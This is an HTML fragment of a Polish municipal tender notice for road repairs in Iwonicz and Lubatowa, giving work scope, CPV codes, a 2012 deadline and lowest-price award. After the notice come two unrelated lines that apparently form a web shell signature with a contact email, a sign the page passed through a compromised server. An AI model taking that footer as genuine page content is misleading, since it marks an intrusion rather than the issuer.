     - wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok 651,00 mb,
     - skropienie nawierzchni asfaltem w ilości 651,00 m2
     - regulacja  pionowa włazów kanałowych w ilości 7 szt.
     - uzupełnienie poboczy szer. do 0,5m i zjazdów kruszywem łamanym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja nawierzchni dróg żwirowych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Remnot drogi gminnej nr ewid. dz. 4627/1, 4737  w m.  Iwonicz:
   Zakres remontu dł.151mb , szer. planowanej  jezdni 2,9m
    - korytowanie mechaniczne podłoża  o głębokości 20cm na całej szerokości jezdni 
       w  ilości 437,00m2    
    - wykonanie podbudowy  tłuczniowo- klińcowej o gr. po zawałowaniu 25cm na 
        długości ok.  151mb,     
      -  wykonanie nawierzchni tłuczniowo - klińcowej o gr. po zawałowaniu   10 cm,
    -  wykonanie przepustu fi 50cm o długości 7,0m pod zjazdami,
    -   rozebranie płyt pełnych o pow. 9m2 

b) Remont drogi gminnej nr ewid. dz. 5363 w m. Lubatowa:  
     Zakres remontu dł.145mb , szer. planowanej  jezdni 3,0m.
    - korytowanie mechaniczne podłoża  o głębokości 25cm 
       w  ilości 165,00m2    
    - wykonanie podbudowy  tłuczniowo- klińcowej o gr. po zawałowaniu od 15-25cm na 
        długości ok.  145mb,     
      -  wykonanie nawierzchni tłuczniowo - klińcowej o gr. po zawałowaniu   9 cm,
    - regulacja pionowa włazów kanałowych studzienek PCV w ilości 4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com